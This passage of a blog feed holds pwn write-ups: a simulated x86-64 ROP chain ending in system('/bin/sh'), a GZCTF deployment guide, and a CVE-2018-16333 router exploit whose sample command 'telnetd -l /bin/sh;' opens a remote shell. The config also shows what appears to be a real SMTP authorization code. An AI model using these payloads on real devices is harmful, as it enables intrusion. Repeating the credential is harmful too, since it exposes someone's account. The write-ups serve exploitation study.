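LEAVE    = 0x40136e   # leave ; ret
RET      = 0x40101a   # ret
PTR_ADDR = 0x401316   # re-enters read(0, rbp-0xf0, 0x100), then leave ; ret

# Assumed placeholders (hypothetical; the real binary and libc differ).
BSS0        = 0x404040          # elf.bss(0)
PUTS_PLT    = 0x401030
PUTS_GOT    = 0x404018
STACK_RBP   = 0x7ffcdeadbe00    # rbp of the vulnerable frame on first entry
LIBC_BASE   = 0x7f1234567000
LIBC_PUTS   = 0x84420           # libc.sym['puts']
LIBC_SYSTEM = 0x52290           # libc.sym['system']
LIBC_BINSH  = 0x1b45bd          # offset of "/bin/sh\0"


def p64(v):
    return struct.pack("<Q", v)


def bss(off):
    return BSS0 + off


class Machine:
    """Just enough x86-64 state to run the chain: sparse memory, rsp, rbp, rdi."""

    def __init__(self):
        self.mem, self.rsp, self.rbp, self.rdi = {}, 0, 0, 0
        self.reads = []     # destination of every read() the chain triggers
        self.calls = []     # ("puts", leaked qword) and ("system", rdi)

    def write(self, addr, data):
        for i, b in enumerate(data):
            self.mem[addr + i] = b

    def qword(self, addr):
        return int.from_bytes(bytes(self.mem.get(addr + i, 0) for i in range(8)), "little")

    def pop(self):
        v = self.qword(self.rsp)
        self.rsp += 8
        return v

    def vuln(self, data):
        """read(0, rbp-0xf0, 0x100) followed by the function's own leave ; ret."""
        assert len(data) <= 0x100
        self.reads.append(self.rbp - 0xf0)
        self.write(self.rbp - 0xf0, data)
        self.rsp = self.rbp                 # leave: mov rsp, rbp
        self.rbp = self.pop()               #        pop rbp
        return self.pop()                   # ret: new rip

    def run(self, rip, inputs):
        """Dispatch on rip until system() is reached."""
        while True:
            if rip == POP_RDI:
                self.rdi, rip = self.pop(), self.pop()
            elif rip == POP_RBP:
                self.rbp, rip = self.pop(), self.pop()
            elif rip == LEAVE:
                self.rsp = self.rbp
                self.rbp, rip = self.pop(), self.pop()
            elif rip == RET:
                rip = self.pop()
            elif rip == PUTS_PLT:           # puts(rdi) prints the qword at rdi, then returns
                self.calls.append(("puts", self.qword(self.rdi)))
                rip = self.pop()
            elif rip == PTR_ADDR:
                rip = self.vuln(next(inputs))
            elif rip == LIBC_BASE + LIBC_SYSTEM:
                self.calls.append(("system", self.rdi))
                return
            else:
                raise RuntimeError(f"unexpected rip {rip:#x}")


def exploit():
    """Replay the exploit's three payloads against the model and return the machine."""
    m = Machine()
    m.write(PUTS_GOT, p64(LIBC_BASE + LIBC_PUTS))   # resolved GOT entry
    m.rbp = STACK_RBP
    base = bss(0x800)                               # the exploit's `bss` variable

    # Stage 1: only the saved rbp and rip are controlled; aim the next read() at bss.
    stage1 = b"A" * 0xf0 + p64(base + 0xf0) + p64(PTR_ADDR)

    def feeds():
        # Stage 2: leak puts, then re-enter read() with rbp = elf.bss(0xbf8).
        chain = (p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT)
                 + p64(POP_RBP) + p64(bss(0xbf8)) + p64(PTR_ADDR))
        yield chain.ljust(0xf0, b"\0") + p64(base - 8) + p64(LEAVE)
        # Stage 3 is only built once the leak has been "received".
        libcbase = m.calls[-1][1] - LIBC_PUTS
        chain = (p64(RET) + p64(POP_RDI) + p64(libcbase + LIBC_BINSH)
                 + p64(libcbase + LIBC_SYSTEM))
        yield chain.ljust(0xf0, b"\0") + p64(bss(0xb00)) + p64(LEAVE)

    m.run(m.vuln(stage1), feeds())
    return m
```
<p>exploit().reads gives the three read() destinations (the original stack frame, bss, then elf.bss(0xb08)) and exploit().calls the leaked puts address followed by system("/bin/sh"). Getting one slot wrong, for instance the bss-8 saved rbp in stage 2, makes run() stop on an unexpected rip, which corresponds to the crash seen against the real binary.</p>]]></content>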
</entry>
<entry>
<title>GZCTF range setup</title>
<link href="/2023/09/25/GZ%E9%9D%B6%E5%9C%BA%E6%90%AD%E5%BB%BA/"/>
<url>/2023/09/25/GZ%E9%9D%B6%E5%9C%BA%E6%90%AD%E5%BB%BA/</url>
<content type="html"><![CDATA[<h1 id="GZ靶场搭建以及pwn题部署"><a href="#GZ靶场搭建以及pwn题部署" class="headerlink" title="GZ靶场搭建以及pwn题部署"></a>GZCTF range setup and pwn challenge deployment</h1><p>The finished result:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251331957.png" alt="Untitled"></p><h1 id="靶场搭建"><a href="#靶场搭建" class="headerlink" title="靶场搭建"></a>Range setup</h1><p>This was built on an Alibaba Cloud Ubuntu 20.04 server. Install docker and docker-compose yourself first (the marketplace Ubuntu 20.04 image that ships with Docker seemed to cause problems; installing Docker by hand turned out to be easier).</p><p>Create two files in one directory; here the directory is named GZCTF and the files are appsettings.json and docker-compose.yml.</p><p>Contents of appsettings.json:</p><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">{<br>  <span class="hljs-string">"AllowedHosts"</span>: <span class="hljs-string">"*"</span>,<br>  <span class="hljs-string">"ConnectionStrings"</span>: {<br>    <span class="hljs-string">"Database"</span>: <span class="hljs-string">"Host=db:5432;Database=gzctf;Username=postgres;Password=<String1>"</span><br>    <span class="hljs-regexp">//</span> replace <String1> with the database password: random and long enough<br>  },<br>  <span class="hljs-string">"Logging"</span>: {<br>    <span class="hljs-string">"LogLevel"</span>: {<br>      <span class="hljs-string">"Default"</span>: <span class="hljs-string">"Information"</span>,<br>      <span class="hljs-string">"Microsoft"</span>: <span class="hljs-string">"Warning"</span>,<br>      <span class="hljs-string">"Microsoft.Hosting.Lifetime"</span>: <span class="hljs-string">"Information"</span><br>    }<br>  },<br>  <span class="hljs-regexp">//</span> mail configuration<br>  <span class="hljs-string">"EmailConfig"</span>: {<br>    <span class="hljs-string">"SendMailAddress"</span>: <span class="hljs-string">"[email protected]"</span>, <span class="hljs-regexp">//</span> sender address<br>    <span class="hljs-string">"UserName"</span>: <span class="hljs-string">"ctf_noreply"</span>, <span class="hljs-regexp">//</span> sender name<br>    <span class="hljs-string">"Password"</span>: <span class="hljs-string">"UWPTINWMFPQVMPAH"</span>, <span class="hljs-regexp">//</span> mailbox password; some providers require an authorization code here instead<br>    <span class="hljs-string">"Smtp"</span>: {<br>      <span class="hljs-string">"Host"</span>: <span class="hljs-string">"smtp.163.com"</span>, <span class="hljs-regexp">//</span> your provider's SMTP server; <span class="hljs-number">163</span> mail is used here<br>      <span class="hljs-string">"Port"</span>: <span class="hljs-number">465</span><br>    }<br>  },<br>  <span class="hljs-string">"XorKey"</span>: <span class="hljs-string">"<String2>"</span>, <span class="hljs-regexp">//</span> choose your own XorKey<br>  <span class="hljs-string">"ContainerProvider"</span>: {<br>    <span class="hljs-string">"Type"</span>: <span class="hljs-string">"Docker"</span>,<br>    <span class="hljs-string">"PublicEntry"</span>: <span class="hljs-string">"xx.xx.xx.xx"</span>, <span class="hljs-regexp">//</span> domain or IP used for the generated challenge containers, without http/https<br>    <span class="hljs-string">"DockerConfig"</span>: {<br>      <span class="hljs-string">"SwarmMode"</span>: false,<br>      <span class="hljs-string">"Uri"</span>: <span class="hljs-string">""</span> <span class="hljs-regexp">//</span> empty: the local Docker daemon is used<br>    }<br>  },<br>  <span class="hljs-string">"RequestLogging"</span>: false,<br>  <span class="hljs-string">"DisableRateLimit"</span>: false,<br>  <span class="hljs-string">"RegistryConfig"</span>: {<br>    <span class="hljs-string">"UserName"</span>: <span class="hljs-string">""</span>,<br>    <span class="hljs-string">"Password"</span>: <span class="hljs-string">""</span>,<br>    <span class="hljs-string">"ServerAddress"</span>: <span class="hljs-string">""</span><br>  },<br><br>  <span class="hljs-regexp">//</span> Google reCAPTCHA configuration<br>  <span class="hljs-string">"GoogleRecaptcha"</span>: {<br>    <span class="hljs-string">"VerifyAPIAddress"</span>: <span class="hljs-string">"https://www.recaptcha.net/recaptcha/api/siteverify"</span>,<br>    <span class="hljs-string">"Sitekey"</span>: <span class="hljs-string">""</span>,<br>    <span class="hljs-string">"Secretkey"</span>: <span class="hljs-string">""</span>,<br>    <span class="hljs-string">"RecaptchaThreshold"</span>: <span class="hljs-string">"0.5"</span><br>  }<br>}<br></code></pre></td></tr></table></figure><p>Contents of docker-compose.yml:</p><figure class="highlight nestedtext"><table><tr><td class="code"><pre><code class="hljs nestedtext"><span class="hljs-attribute">version</span><span class="hljs-punctuation">:</span> <span class="hljs-string">'3.0'</span><br><span class="hljs-attribute">services</span><span class="hljs-punctuation">:</span><br>  <span class="hljs-attribute">gzctf</span><span class="hljs-punctuation">:</span><br>    <span class="hljs-attribute">image</span><span class="hljs-punctuation">:</span> <span class="hljs-string">gztime/gzctf:latest</span><br>    <span class="hljs-attribute">restart</span><span class="hljs-punctuation">:</span> <span class="hljs-string">always</span><br>    <span class="hljs-attribute">environment</span><span class="hljs-punctuation">:</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">"GZCTF_ADMIN_PASSWORD=<String3>" # replace <String3> with the administrator password; the account name is Admin</span><br>    <span class="hljs-attribute">ports</span><span class="hljs-punctuation">:</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">"80:80" # exposed port, host port first</span><br>    <span 
class="hljs-attribute">networks</span><span class="hljs-punctuation">:</span><br>      <span class="hljs-attribute">default</span><span class="hljs-punctuation">:</span><br>    <span class="hljs-attribute">volumes</span><span class="hljs-punctuation">:</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">"./data/files:/app/uploads"</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">"./appsettings.json:/app/appsettings.json:ro"</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">"./logs:/app/log"</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">"./data/keys:/root/.aspnet/DataProtection-Keys"</span><br>      <span class="hljs-comment"># - "./k8sconfig.yaml:/app/k8sconfig.yaml:ro"</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">"/var/run/docker.sock:/var/run/docker.sock"</span><br>    <span class="hljs-attribute">depends_on</span><span class="hljs-punctuation">:</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">db</span><br><br>  <span class="hljs-attribute">db</span><span class="hljs-punctuation">:</span><br>    <span class="hljs-attribute">image</span><span class="hljs-punctuation">:</span> <span class="hljs-string">postgres:alpine</span><br>    <span class="hljs-attribute">restart</span><span class="hljs-punctuation">:</span> <span class="hljs-string">always</span><br>    <span class="hljs-attribute">environment</span><span class="hljs-punctuation">:</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">"POSTGRES_PASSWORD=<String1>" # database password; it must match the one in appsettings.json</span><br>    <span class="hljs-attribute">networks</span><span class="hljs-punctuation">:</span><br>      <span class="hljs-attribute">default</span><span class="hljs-punctuation">:</span><br>    <span class="hljs-attribute">volumes</span><span class="hljs-punctuation">:</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">"./data/db:/var/lib/postgresql/data"</span><br><br><span class="hljs-attribute">networks</span><span class="hljs-punctuation">:</span><br>  <span class="hljs-attribute">default</span><span class="hljs-punctuation">:</span><br>    <span class="hljs-attribute">driver</span><span class="hljs-punctuation">:</span> <span class="hljs-string">bridge</span><br>    <span class="hljs-attribute">ipam</span><span class="hljs-punctuation">:</span><br>      <span class="hljs-attribute">config</span><span class="hljs-punctuation">:</span><br>        <span class="hljs-bullet">-</span> <span class="hljs-string">subnet: 192.168.12.0/24</span><br></code></pre></td></tr></table></figure><p>Mounting /var/run/docker.sock is what lets the gzctf container create challenge containers, but it also makes that container root-equivalent on the host; protect the platform image and the Admin credentials as carefully as the server itself.</p><p>Connect to the server over ssh, upload the directory and start the deployment:</p><figure class="highlight vim"><table><tr><td class="code"><pre><code class="hljs vim"><span class="hljs-keyword">cd</span> GZCTF<br>docker-compose <span class="hljs-keyword">up</span> -d<br></code></pre></td></tr></table></figure><p>Once it is up, check the logs to confirm the deployment succeeded; the main thing to look for is whether the gzctf container connected to the database.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251331972.png" alt="Untitled"></p><p>The connection failure shown here did not seem to affect the range; the features I tested worked normally anyway.</p><h3 id="pwn题部署"><a href="#pwn题部署" class="headerlink" title="pwn题部署"></a>pwn challenge deployment</h3><p>Log in as Admin, create a game and then a challenge. For a pwn challenge with a dynamic container you will find that the image has to be published on Docker Hub.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251331962.png" alt="image.png"></p><p>Register a Docker Hub account and create a repository, note the username and the repository name, then log in from the VM:</p><figure class="highlight nginx"><table><tr><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">sudo</span> docker login -u <username><br></code></pre></td></tr></table></figure><p>Next build the image for the challenge. Start from a pwn challenge template: <a 
href="https://xjcve.yuque.com/attachments/yuque/0/2023/zip/26443359/1685893120948-8f6bf7e0-21db-472a-aa9f-a4c7c8b6cfc8.zip?_lake_card=%7B%22src%22:%22https://xjcve.yuque.com/attachments/yuque/0/2023/zip/26443359/1685893120948-8f6bf7e0-21db-472a-aa9f-a4c7c8b6cfc8.zip%22,%22name%22:%22docker.zip%22,%22size%22:5282,%22ext%22:%22zip%22,%22source%22:%22%22,%22status%22:%22done%22,%22download%22:true,%22taskId%22:%22u1bf64474-40ad-4c9f-bf97-207f0222a78%22,%22taskType%22:%22upload%22,%22type%22:%22application/x-zip-compressed%22,%22__spacing%22:%22both%22,%22id%22:%22u4182cfb9%22,%22margin%22:%7B%22top%22:true,%22bottom%22:true%7D,%22card%22:%22file%22%7D">docker.zip</a>. Remember to adjust the run.sh inside it (this copy already has the change): it only has to echo the GZCTF_FLAG environment variable into flag and flag.txt. It is worth unsetting GZCTF_FLAG in run.sh once the file is written, because otherwise every process started by the service inherits the variable and the flag can be read out of the environment without solving the challenge. Then build the image and rename it to the repository and tag:</p><figure class="highlight crmsh"><table><tr><td class="code"><pre><code class="hljs crmsh">sudo docker build -t <span class="hljs-string">"pwn"</span> ./<br>sudo docker <span class="hljs-keyword">tag</span> <span class="hljs-title">pwn</span>:latest youlinyo/youlin:pwn <span class="hljs-comment"># youlinyo is the Docker Hub username, youlin the repository</span><br></code></pre></td></tr></table></figure><p>Then push the image to Docker Hub:</p><figure class="highlight arcade"><table><tr><td class="code"><pre><code class="hljs arcade">sudo docker <span class="hljs-built_in">push</span> youlinyo/youlin:pwn<br></code></pre></td></tr></table></figure><p>The target can now be tested from the platform, and dynamic containers can be created during the game as well (remember that the flag format and the challenge attachment are set there too; the platform hands the flag to the container in the GZCTF_FLAG environment variable).</p>]]></content>
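<content type="html"><![CDATA[<p>Added example, not from the original post: a small Python check for the two mistakes the notes above warn about, a database password that differs between appsettings.json and docker-compose.yml, and <String1>-style placeholders or short secrets left in place. It strips the // comments that appsettings.json carries (the .NET configuration loader tolerates them, json.loads does not), reads the environment lists of the compose file with a minimal indentation-based reader instead of a YAML library, and returns the findings as strings. SAMPLE_APPSETTINGS and SAMPLE_COMPOSE are constructed, trimmed-down copies of the two files above with the placeholders still in; the function names are my own.</p>
```python
import json
import re


def strip_json_comments(text):
    """Remove // comments outside string literals. The .NET config loader accepts
    them, json.loads does not, and a naive split on // would cut https:// URLs."""
    out, in_str, i = [], False, 0
    while i < len(text):
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < len(text):     # keep escaped characters intact
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):             # skip to end of line
            nl = text.find("\n", i)
            i = nl if nl >= 0 else len(text)
            continue
        else:
            out.append(c)
        i += 1
    return "".join(out)


def compose_env(text):
    """Read {service: {KEY: value}} from the 2-space-indented compose layout above
    (environment lists only; this is not a YAML parser)."""
    env, current, section, in_services = {}, None, None, False
    for raw in text.splitlines():
        line = raw.split(" #", 1)[0].rstrip()       # drop trailing comments
        if not line.strip():
            continue
        indent, item = len(line) - len(line.lstrip()), line.strip()
        if indent == 0:
            in_services, current, section = item == "services:", None, None
        elif not in_services:
            continue
        elif indent == 2 and item.endswith(":"):
            current, section = item[:-1], None
            env[current] = {}
        elif indent == 4 and item.endswith(":"):
            section = item[:-1]
        elif item.startswith("- ") and current and section == "environment":
            key, _, value = item[2:].strip().strip("\"'").partition("=")
            env[current][key] = value
    return env


def check_gzctf_config(appsettings_text, compose_text):
    """Return findings as 'ERROR: ...' strings; an empty list means consistent."""
    cfg = json.loads(strip_json_comments(appsettings_text))
    conn = cfg.get("ConnectionStrings", {}).get("Database", "")
    conn_kv = dict(p.split("=", 1) for p in conn.split(";") if "=" in p)
    env = compose_env(compose_text)
    secrets = {
        "database password in appsettings.json": conn_kv.get("Password", ""),
        "POSTGRES_PASSWORD": env.get("db", {}).get("POSTGRES_PASSWORD", ""),
        "GZCTF_ADMIN_PASSWORD": env.get("gzctf", {}).get("GZCTF_ADMIN_PASSWORD", ""),
        "XorKey": cfg.get("XorKey", ""),
    }
    findings = []
    if secrets["database password in appsettings.json"] != secrets["POSTGRES_PASSWORD"]:
        findings.append("ERROR: database password differs between appsettings.json and docker-compose.yml")
    for name, value in secrets.items():
        if not value or re.fullmatch(r"<String\d+>", value):
            findings.append(f"ERROR: {name} is still the placeholder {value!r}")
        elif len(value) < 16:
            findings.append(f"ERROR: {name} is shorter than 16 characters")
    return findings


# Constructed sample pair in the shape shown above, placeholders still in place.
SAMPLE_APPSETTINGS = """{
  "ConnectionStrings": {
    "Database": "Host=db:5432;Database=gzctf;Username=postgres;Password=<String1>"
    // replace <String1> with the database password
  },
  "XorKey": "<String2>", // choose your own XorKey
  "GoogleRecaptcha": { "VerifyAPIAddress": "https://www.recaptcha.net/recaptcha/api/siteverify" }
}"""
SAMPLE_COMPOSE = """version: '3.0'
services:
  gzctf:
    image: gztime/gzctf:latest
    environment:
      - "GZCTF_ADMIN_PASSWORD=<String3>" # the account name is Admin
  db:
    image: postgres:alpine
    environment:
      - "POSTGRES_PASSWORD=<String1>" # must match appsettings.json
"""
```
<p>Run check_gzctf_config on the real pair before docker-compose up; an empty result means the two passwords match and no placeholder is left. The comment stripper tracks string literals, so the https:// inside VerifyAPIAddress survives while the trailing // comments are removed.</p>]]></content>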
</entry>
<entry>
<title>CVE-2018-16333 reproduction</title>
<link href="/2023/09/25/CVE-2018-16333%E5%A4%8D%E7%8E%B0/"/>
<url>/2023/09/25/CVE-2018-16333%E5%A4%8D%E7%8E%B0/</url>
<content type="html"><![CDATA[<p>So the exploit is built as:</p><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">payload = <span class="hljs-string">b'a'</span>*<span class="hljs-number">0x60</span> + p32(readable_addr) + <span class="hljs-string">b'b'</span>*(<span class="hljs-number">0x20</span>-<span class="hljs-number">8</span>)<br>payload += p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3) + cmd<br></code></pre></td></tr></table></figure><p>readable_addr occupies a stack slot the function still reads through before it returns, which is why that slot needs a mapped address rather than filler. pop_r3 then loads system into r3, and the mov_r0_ret_r3 gadget points r0 at the stack before jumping through r3, so the cmd string placed right after it becomes system's argument.</p><p>With a breakpoint on the return address (b *0x00067758) the saved return address on the stack can be seen replaced by the ROP chain we built.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251322220.png" alt="Untitled"></p><p>Successful run:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251322631.png" alt="Untitled"></p>]]></content>
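<content type="html"><![CDATA[<p>Added example, not part of the original write-up: a Python model of the two ARM gadgets, showing why cmd can simply follow the gadget addresses on the stack. The gadget and function addresses are assumed placeholders (the real ones come from the firmware), mov_r0_ret_r3 is assumed to have the usual shape mov r0, sp; blx r3, the saved pc is taken to sit at offset 0x7c (0x60 + 4 + 0x18, from the payload layout above), and the command string is a constructed sample.</p>
```python
import struct

# Assumed placeholders (hypothetical; the real addresses come from the firmware).
POP_R3_PC  = 0x00040200   # pop {r3, pc}
MOV_R0_BLX = 0x00040300   # mov r0, sp ; blx r3   (assumed shape of mov_r0_ret_r3)
SYSTEM     = 0x00050000   # libc system()
READABLE   = 0x00100000   # any mapped address for the slot read before the return
STACK_BASE = 0xbefff000   # where the overflowed buffer sits in memory


def p32(v):
    return struct.pack("<I", v)


def build_payload(cmd):
    """Layout from the write-up: 0x60 filler, a readable pointer, 0x18 filler,
    then the saved pc (first gadget), system, second gadget and the command."""
    return (b"a" * 0x60 + p32(READABLE) + b"b" * (0x20 - 8)
            + p32(POP_R3_PC) + p32(SYSTEM) + p32(MOV_R0_BLX) + cmd + b"\0")


def run_chain(payload):
    """Model the function epilogue (pop {pc} at offset 0x7c) and the two gadgets."""
    stack, sp = payload, 0x7c

    def pop():
        nonlocal sp
        v = struct.unpack_from("<I", stack, sp)[0]
        sp += 4
        return v

    pc = pop()                        # epilogue: pop {..., pc}
    if pc != POP_R3_PC:
        raise RuntimeError(f"saved pc is {pc:#x}, chain not reached")
    r3, pc = pop(), pop()             # pop {r3, pc}
    if pc != MOV_R0_BLX:
        raise RuntimeError("second gadget not reached")
    r0 = STACK_BASE + sp              # mov r0, sp : r0 -> the bytes after the gadget
    pc = r3                           # blx r3     : system(r0)
    arg = stack[sp:stack.index(b"\0", sp)]
    return {"pc": pc, "r0": r0, "arg": arg}
```
<p>run_chain(build_payload(b"telnetd -l /bin/sh;")) ends with pc equal to SYSTEM, r0 pointing 12 bytes past the saved pc and arg equal to the command, which is exactly the layout the payload above relies on.</p>]]></content>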
</entry>
</search>